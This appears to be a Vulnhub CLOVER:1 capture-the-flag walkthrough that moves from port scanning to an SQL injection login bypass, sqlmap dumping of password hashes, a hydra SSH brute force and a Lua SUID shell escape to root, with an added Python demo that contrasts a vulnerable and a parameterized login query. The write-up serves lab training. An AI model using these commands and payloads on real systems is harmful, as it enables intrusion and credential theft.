Vulnhub CLOVER:1 writeup

Hi all, hope you all are safe. In this walkthrough, I will walk you through how to get root on the CLOVER:1 machine. It was created by 0xJin & 0xBushido. You can download it from this link.

Let’s start with nmap.

Nmap to find open ports:

finding open ports using nmap

Service version detection using nmap:

Service version detection using nmap

Downloaded all files from FTP on the local machine.

Nothing interesting in the files downloaded via FTP; it's a rabbit hole!

The nmap scan shows a robots.txt with the entries below, another rabbit hole.

robots.txt

I decided to run gobuster and found a few new entries.

gobuster result

Visited /website in a browser; it opens the page below.

Also tried common username and password combinations on the phpMyAdmin login page, but was unable to log in. Then I viewed the source code of /website in the browser and it gave me the hint.

ColdFusion CMS

The ColdFusion CMS is used to build the website. I searched for the ColdFusion login URL and found that it starts with the “CFIDE” directory. I visited it in the browser and it gave me the result below.

I opened the Administrator directory. I tried gobuster with the “.cfm” extension, but was unable to fetch additional results. Then I decided to use extensions like “.php,.html,.zip,.bak”; it gave me the result below.

Visited /login.php, which asked for a username and password. Tried different common usernames and passwords, but failed to log in.

Failed login attempt

Then I used a simple SQLi payload to log in, and I successfully logged into the application.

SQLI injection
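To show why the login form above could be bypassed, here is an added example (not code from the CLOVER:1 box or this writeup) with a constructed in-memory SQLite copy of the writeup's `users` table and its MD5 password hashes. The vulnerable check builds the query by string concatenation, so a classic comment-terminated tautology in the username field logs in without a valid password; the parameterized version treats the same input as plain data.

```python
import hashlib
import sqlite3

# Constructed sample accounts mirroring the writeup's schema (users table with
# usernames and unsalted MD5 hashes). Passwords here are made up.
SAMPLE_USERS = [("asta", "correct-horse"), ("sword", "battery-staple")]

# Constructed textbook payload: closes the quoted username, adds a tautology,
# and comments out the rest of the WHERE clause (including the password check).
BYPASS_USERNAME = "' OR 1=1 -- "


def seed_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database shaped like the clover.users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    for user, pw in SAMPLE_USERS:
        # Unsalted MD5, as found on the box; a real app should use a slow,
        # salted hash (bcrypt/scrypt/argon2) instead.
        conn.execute("INSERT INTO users VALUES (?, ?)",
                     (user, hashlib.md5(pw.encode()).hexdigest()))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Login check assembled by string formatting: user input becomes SQL syntax."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{pw_hash}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with bound parameters: input is data and can never alter the query."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()
    return row is not None


def compare() -> dict:
    """Run the bypass input through both checks; only the vulnerable one accepts it."""
    conn = seed_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, BYPASS_USERNAME, "anything"),
        "parameterized_bypassed": login_parameterized(conn, BYPASS_USERNAME, "anything"),
        "parameterized_valid_login": login_parameterized(conn, "asta", "correct-horse"),
    }


if __name__ == "__main__":
    print(compare())
```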

But this did not give me anything I could use, so I decided to use sqlmap to exploit the SQL injection further. I saved the login request to a file to use with sqlmap.

Used the command below to retrieve the current database.

sqlmap -r /tmp/clover_login_sqlmap --current-db --batch --risk=3 --level=5

current database is clover

To retrieve the table names in the clover database, I used the command below.

sqlmap -r /tmp/clover_login_sqlmap -D clover --tables --batch --risk=3 --level=5

user table in clover database

Fetching column names:

sqlmap -r /tmp/clover_login_sqlmap -D clover -T users --columns --batch --risk=3 --level=5

columns in table users

Final step: dump the data in table users. Now I have usernames and MD5-hashed passwords.

usernames and hashed passwords

I tried to crack the hashes online and was able to crack the one for user asta. Used the cracked password to log in as asta.

I used linPEAS.sh to automatically enumerate the box further; the “Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)” section showed the passwd.sword file.

I decided to take a look at the file, and it gives me a partial password for user sword:

I needed to create a password list with crunch to brute-force SSH for user sword.

Now I have a username and a list of passwords; tried an SSH brute-force using hydra to find the password for user sword.

hydra -l sword -P /tmp/clover/sword_pass ssh://192.168.9.94 -t 30 -V

Hydra successfully found the password for sword.

sword password

After logging in as sword via ssh, I used the find command to look for SUID binaries and found one.

suid binaries
deamon.sh suid

When I execute deamon.sh it gives a prompt, and it's Lua; GTFOBins helped me get root using the command below.

os.execute("/bin/sh")
root flag

Thanks for reading. Hope you like it.
